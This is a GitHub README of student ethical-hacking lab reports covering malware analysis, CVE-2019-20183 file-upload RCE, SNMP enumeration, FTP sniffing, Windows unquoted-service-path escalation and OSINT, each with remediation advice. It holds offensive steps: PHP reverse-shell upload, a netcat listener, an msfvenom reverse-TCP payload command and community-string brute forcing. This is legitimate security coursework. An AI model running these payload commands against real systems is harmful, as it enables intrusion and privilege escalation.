cyr6x/ethical-hacking-lab-reports

GitHub: cyr6x/ethical-hacking-lab-reports

一套覆盖 CVE 利用、恶意软件分析、OSINT 侦察、SNMP 枚举、FTP 取证和 Windows 提权等主题的道德黑客实操实验报告合集,附有详细操作步骤与修复建议。

Stars: 0 | Forks: 0

# 道德黑客与信息安全实验报告 ![安全](https://img.shields.io/badge/Security-Ethical_Hacking-red?style=flat-square) ![级别](https://img.shields.io/badge/Level-5_Diploma-blue?style=flat-square) ![工具](https://img.shields.io/badge/Tools-Nmap_|_Burp_Suite_|_Wireshark_|_Metasploit-darkgreen?style=flat-square) ![状态](https://img.shields.io/badge/Status-Completed-brightgreen?style=flat-square) 作为**计算与网络安全 5 级文凭**(NCC Education)课程的一部分,完成的一系列关于道德黑客和信息安全评估的实操实验报告合集。每个实验均在**隔离的、经授权的学术环境**中进行。 ## 实验索引 | # | 实验 | 关键技术 | 使用工具 | |---|-----|---------------|------------| | 01 | [恶意软件分析](#01-malware-analysis) | 静态与动态分析,IOC 提取 | Ghidra, Cuckoo Sandbox, Volatility, FTK Imager | | 02 | [CVE-2019-20183 漏洞利用](#02-cve-2019-20183--unrestricted-file-upload--rce) | 文件上传绕过,RCE,CVSS 评分 | Burp Suite, msfvenom, Netcat | | 03 | [SNMP 枚举](#03-snmp-enumeration-port-161) | 服务枚举,MIB walking | Nmap, onesixtyone, snmpwalk | | 04 | [FTP 取证与数据包分析](#04-ftp-forensics--packet-analysis) | 凭证捕获,协议分析 | Wireshark, tcpdump | | 05 | [Unquoted Service Path 提权](#05-unquoted-service-path-privilege-escalation) | Windows 提权,服务漏洞利用 | WMIC, msfvenom, accesschk | | 06 | [OSINT 与信息收集](#06-osint--footprinting) | 被动侦察,元数据提取 | theHarvester, Shodan, Maltego, FOCA | ## 01. 恶意软件分析 **目标:** 对恶意软件样本执行静态和动态分析,以识别其行为、持久化机制和失陷指标 (IOC)。 **技术:** - 静态分析:字符串提取、PE 头检查、哈希识别 - 动态分析:沙箱执行、网络流量监控、注册表监控 - 内存取证:进程注入识别 **工具:** `Ghidra` `Cuckoo Sandbox` `Volatility` `FTK Imager` `VirusTotal` **关键发现:** - 识别出通过 DNS 查询向硬编码 IP 进行的 C2 回连行为 - 检测到注册表持久化键:`HKCU\Software\Microsoft\Windows\CurrentVersion\Run` - 提取了网络 IOC:端口 4444 上的可疑出站连接 **Security+ 映射:** 领域 2 — 威胁情报与恶意软件类型 ## 02. CVE-2019-20183 — 无限制文件上传与 RCE **CVE:** CVE-2019-20183 | **CVSS v3.1:** 7.2 (高危) | **系统:** Employee Records System 1.0 **漏洞:** `uploadimage.php` 中仅存在客户端文件扩展名验证。服务器不执行 MIME 类型检查,允许上传任意的 PHP webshell。 **利用步骤:** ``` 1. Intercept upload request with Burp Suite 2. Modify Content-Type header to bypass client-side JS validation 3. Upload PHP reverse shell with allowed extension 4. Navigate to upload directory to trigger execution 5. Catch reverse shell: nc -lvnp 4444 ``` **修复建议:** - 为文件扩展名实施服务器端白名单 - 将上传文件存储在 Web 根目录之外,并使用随机化文件名 - 在服务器端添加 MIME 类型验证 - 打补丁后重新测试以确认修复 **Security+ 映射:** 领域 2 — 漏洞与应用程序安全 ## 03. SNMP 枚举 (端口 161) **目标:** 枚举启用了 SNMP 的设备,以提取系统信息、运行进程和网络配置。 **技术:** - SNMP v1/v2c 团体字符串爆破 - MIB (管理信息库) walking - 通过 SNMP 发现网络拓扑 **使用的命令:** ``` # 发现 SNMP 主机 nmap -sU -p 161 --open 192.168.1.0/24 # 暴力破解 community strings onesixtyone -c community_strings.txt 192.168.1.x # 遍历 MIB 树 snmpwalk -v2c -c public 192.168.1.x ``` **关键发现:** - 默认团体字符串 `public` 暴露了完整的系统 MIB - 成功提取了运行进程、已安装软件和路由表 - SNMP v1/v2c 没有身份验证或加密 **修复建议:** 升级到具有 AuthPriv 模式的 SNMPv3;将 SNMP 访问限制在管理 VLAN 内 **Security+ 映射:** 领域 3 — 网络安全与枚举 ## 04. FTP 取证与数据包分析 **目标:** 捕获并分析 FTP 流量,以证明凭证的暴露风险并提出安全的替代方案。 **技术:** - 对 FTP 会话进行数据包捕获 (端口 21) - 从明文流量中提取凭证 - 协议比较:FTP vs FTPS vs SFTP **使用的命令:** ``` # 捕获 FTP 流量 tcpdump -i eth0 port 21 -w ftp_capture.pcap # 在 Wireshark 中过滤 ftp.request.command == "USER" || ftp.request.command == "PASS" ``` **关键发现:** - 用户名和密码以明文形式传输,在不到 3 秒内即被捕获 - 目录结构和文件名在数据包流中完全可见 - 在 FTP 会话的任何阶段都没有加密 **修复建议:** 用 SFTP (端口 22) 或 FTPS (端口 990) 替换 FTP;强制使用基于密钥的身份验证 **Security+ 映射:** 领域 3 — 协议安全与网络分析 ## 05. Unquoted Service Path 提权 **目标:** 利用 Windows 系统上的 Unquoted Service Path 漏洞,将标准用户的权限提升至 SYSTEM。 **漏洞:** 包含空格且不带引号的 Windows 服务二进制路径,允许攻击者在更早的路径段中放置恶意可执行文件。 **利用步骤:** ``` 1. Enumerate vulnerable services wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" 2. Verify write permissions on vulnerable path accesschk.exe -wvu "C:\Program Files\Vulnerable App" 3. Place malicious payload at exploitable path msfvenom -p windows/shell_reverse_tcp LHOST=x.x.x.x LPORT=4444 -f exe > payload.exe 4. Restart service and catch SYSTEM shell ``` **关键发现:** - 从标准用户账户实现了 SYSTEM 级别的访问权限 - 服务重启触发了 payload 执行,无需用户交互 - 漏洞的存在是由于服务配置中不正确的路径引用 **修复建议:** 将所有服务二进制路径用引号括起来;对服务账户应用最小权限原则 **Security+ 映射:** 领域 2 — 漏洞利用与 Windows 安全 ## 06. OSINT 与信息收集 **目标:** 对目标组织进行被动侦察,在不进行直接交互的情况下映射其攻击面。 **技术:** - 电子邮件收集与员工枚举 - DNS 和子域枚举 - 从公开文档中提取元数据 - Shodan IoT/设备发现 **工具与命令:** ``` # Email 和子域名收集 theHarvester -d target.com -b google,linkedin,bing # Shodan 设备发现 shodan search org:"Target Organisation" # DNS 枚举 nslookup -type=ANY target.com ``` **关键发现:** - 从公共来源收集了 14 个员工电子邮件地址 - 识别出 3 个暴露的子域,其中包括一个 staging 环境 - PDF 元数据揭示了内部用户名和软件版本 - Shodan 识别出 2 台面向互联网且使用默认凭证的设备 **修复建议:** 剥离公开文档中的元数据;禁用不必要的子域;更改默认凭证;实施电子邮件地址混淆 **Security+ 映射:** 领域 2 — 威胁情报、OSINT 与侦察 ## 展示技能 | 类别 | 技能 | |----------|--------| | 进攻性安全 | CVE 利用、权限提升、Web 应用攻击、社会工程学侦察 | | 网络分析 | 数据包捕获、协议分析、流量过滤、凭证提取 | | OSINT | 被动侦察、元数据分析、电子邮件收集、攻击面映射 | | 恶意软件分析 | 静态/动态分析、IOC 提取、内存取证、沙箱分析 | | 修复建议 | 安全控制、补丁管理、加固建议 | ## 环境与道德 ## 相关代码库 - [网络安全防御](https://github.com/Cyril556/network-security-defence) — LAN 设计,DMZ 架构,DDoS 缓解 - [CCorp SIRTS](https://github.com/Cyril556/ccorp-sirts) — 安全事件响应与工单系统 - [SY0-701 考试模拟器](https://github.com/Cyril556/sy0-701-simulator) — CompTIA Security+ 练习平台
标签:Burp Suite, CTI, Cuckoo Sandbox, CVE漏洞利用, CVSS评分, DAST, ESC4, FTP取证, Ghidra, Go语言工具, IP 地址批量处理, Level 5 Diploma, meg, NCC Education, Nmap, OSINT, RCE, SNMP枚举, Windows提权, Wireshark, 云安全监控, 信息安全, 协议分析, 句柄查看, 安全实训, 安全实验报告, 实时处理, 恶意软件分析, 插件系统, 无线安全, 权限提升, 编程工具, 网络安全, 网络靶场, 虚拟驱动器, 远程代码执行, 防御绕过, 隐私保护, 静态分析